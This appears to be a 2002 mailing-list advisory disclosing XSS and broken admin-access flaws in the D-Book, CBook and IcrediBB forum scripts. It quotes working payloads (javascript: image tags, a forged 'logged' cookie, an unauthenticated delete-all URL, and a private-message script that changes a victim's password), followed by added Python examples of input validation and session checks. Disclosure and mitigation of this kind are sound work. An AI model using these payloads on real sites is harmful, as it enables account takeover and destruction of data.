Security holes : D-Book, CBook, IcrediBB

From: frog frog (leseulfrogat_private)
Date: Fri Apr 12 2002 - 05:09:53 PDT


    Product 1 :
    D-Book
    http://www.smartbb.net
    
    Versions :
    1.4 (and less ?)
    
    Problems :
    - XSS
    - Admin access
    
    Exploits :
    - [img=javascript:alert(%27hum%27)]
    - Cookie "logged,anyvalue" on admin.php
    
    More details in French :
    http://www.ifrance.com/kitetoua/tuto/D-Book.txt
    
    translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-Book.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    ****************************************
    Product 2 :
    CBook
    
    Versions :
    1.0.1 beta
    
    Problems :
    - XSS
    - Access to an admin function (delete all entries)
    
    Exploits :
    - <script>ANYSCRIPT</script> on profile
    - http://www.site.com/index.php?Change=2
    
    More details in French :
    http://www.ifrance.com/kitetoua/tuto/Cbook.txt
    
    translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    
    ***********************************************
    Product 3:
    IcrediBB Bulletin Board System
    http://www.icredibb.com
    
    Versions :
    1.1 beta
    
    Problems :
    - Access to users/admins account
    - XSS
    
    Exploits :
    - To change password, in a private message :
    <sc*ript>
    window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
    window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
    window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
    window.open('index.php?function=logout');
    window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
    </s*cript>
    (without '*')
    
    - In subject (private message) :
    &lt;script&gt;ANYSCRIPT&lt;/script&gt;
    
    - In webbrowser :
    
    /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('hello')&message=MESSAGE&submitpm=Submit PM
    
    /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:window.open('http:%2F%2Fwww.url.com')&message=MESSAGE&submitpm=Submit PM
    
    /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:a='http:%2F%2Fwww.url.com'%3Bwindow.open(a)%3B&message=MESSAGE&submitpm=Submit PM
    
    
    - In /usercp.php?function=avataroptions :
    javascript:alert(%27HeLLo%27)
    
    More details in French :
    http://www.ifrance.com/kitetoua/tuto/icrediBB.txt
    
    translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    **************************************************
    
    frog-m@n
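All three products above fail in the same way on the XSS side: a user-supplied value (the `[img=...]` URL in D-Book, the `images=` and avatar URLs in IcrediBB, the profile and private-message subject fields in CBook and IcrediBB) is placed into the page without checking that a URL really is an http(s) URL or escaping free text. The following is an added example, written in Python rather than the products' PHP and not taken from the advisory or from any of the boards, of the server-side validation a board could apply. `safe_image_url`, `render_img_bbcode`, `render_text` and `ALLOWED_SCHEMES` are hypothetical names; the approach is an allowlist of schemes checked on the percent-decoded value, plus HTML escaping of text fields.

```python
# Added example (hypothetical names; not code from D-Book, CBook or IcrediBB):
# allowlist validation for user-supplied image URLs and escaping for free text.
import html
from typing import Optional
from urllib.parse import unquote, urlsplit

# Only absolute http(s) URLs may become an <img src>; everything else is dropped.
ALLOWED_SCHEMES = {"http", "https"}


def safe_image_url(raw: str) -> Optional[str]:
    """Return the raw URL if it is an absolute http(s) URL, otherwise None.

    The value is judged on its percent-decoded form so that encoded variants
    such as javascript:alert(%27hum%27) or %6aavascript:... cannot slip past
    a check that only looks at the literal prefix. Any whitespace or C0
    control character left after decoding causes rejection, because browsers
    tolerate such characters inside a scheme ("java\tscript:"); the cost is
    that URLs with a literal encoded space are also refused.
    """
    decoded = unquote(raw)
    if any(ch.isspace() or ord(ch) < 0x20 for ch in decoded):
        return None
    parts = urlsplit(decoded)
    # urlsplit lowercases the scheme; require a host so relative paths and
    # bare "javascript:..." values (which have no netloc) are both refused.
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return raw


def render_img_bbcode(url_value: str) -> str:
    """Render a [img=...] BBCode tag as an <img> element, or drop it entirely."""
    url = safe_image_url(url_value)
    if url is None:
        return ""
    # Escape quotes too, so the value cannot break out of the src attribute.
    return '<img src="%s">' % html.escape(url, quote=True)


def render_text(value: str) -> str:
    """HTML-escape free text (profile fields, PM subjects) before output."""
    return html.escape(value, quote=True)
```

Dropping a rejected URL outright, rather than trying to "clean" it, is deliberate: a sanitizer that rewrites the value has to anticipate every encoding a browser will accept, while an allowlist only has to recognise the one form the board actually wants to display.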
    

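The two access-control items (D-Book's admin.php accepting a `logged` cookie with any value, and CBook's `index.php?Change=2` running a delete-all action with no check at all) share one root cause: the privilege is decided from something the client controls, or from nothing. The block below is an added example, in Python and not code from either product or from the advisory, contrasting the presence-only cookie check with a server-side session lookup and putting that lookup in front of the destructive action. `SESSIONS`, `login`, `is_admin_vulnerable`, `is_admin_fixed` and `handle_change` are hypothetical names; the session store and user records are constructed sample data.

```python
# Added example (hypothetical names; not code from D-Book or CBook): a cookie
# that merely has to exist proves nothing; the role must live server-side.
import secrets
from typing import Dict, List, Tuple

# Server-side session store: opaque session id -> user record (constructed).
SESSIONS: Dict[str, dict] = {}


def login(username: str, is_admin: bool) -> str:
    """Create a server-side session and return the opaque id for the cookie."""
    sid = secrets.token_urlsafe(32)  # unguessable; the role is NOT in the cookie
    SESSIONS[sid] = {"user": username, "admin": is_admin}
    return sid


def is_admin_vulnerable(cookies: Dict[str, str]) -> bool:
    """Weak check: any 'logged' cookie, whatever its value, grants admin."""
    return "logged" in cookies


def is_admin_fixed(cookies: Dict[str, str]) -> bool:
    """Fixed check: the cookie is only a lookup key; the role comes from the store."""
    session = SESSIONS.get(cookies.get("sid", ""))
    return bool(session and session["admin"])


def handle_change(params: Dict[str, str], cookies: Dict[str, str],
                  entries: List[str]) -> Tuple[int, List[str]]:
    """Dispatch a 'Change' action and return (HTTP status, resulting entries).

    Change=2 stands for the delete-all action named in the advisory; the
    authorization check is applied before the action, not to the page that
    links to it, so calling the URL directly gains nothing.
    """
    if params.get("Change") == "2":
        if not is_admin_fixed(cookies):
            return 403, entries  # refuse; nothing is deleted
        return 200, []           # authorized: all entries removed
    return 200, entries
```

The check sits inside the action handler rather than on the menu that exposes it: hiding a link is not an access control, because the URL is the interface.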

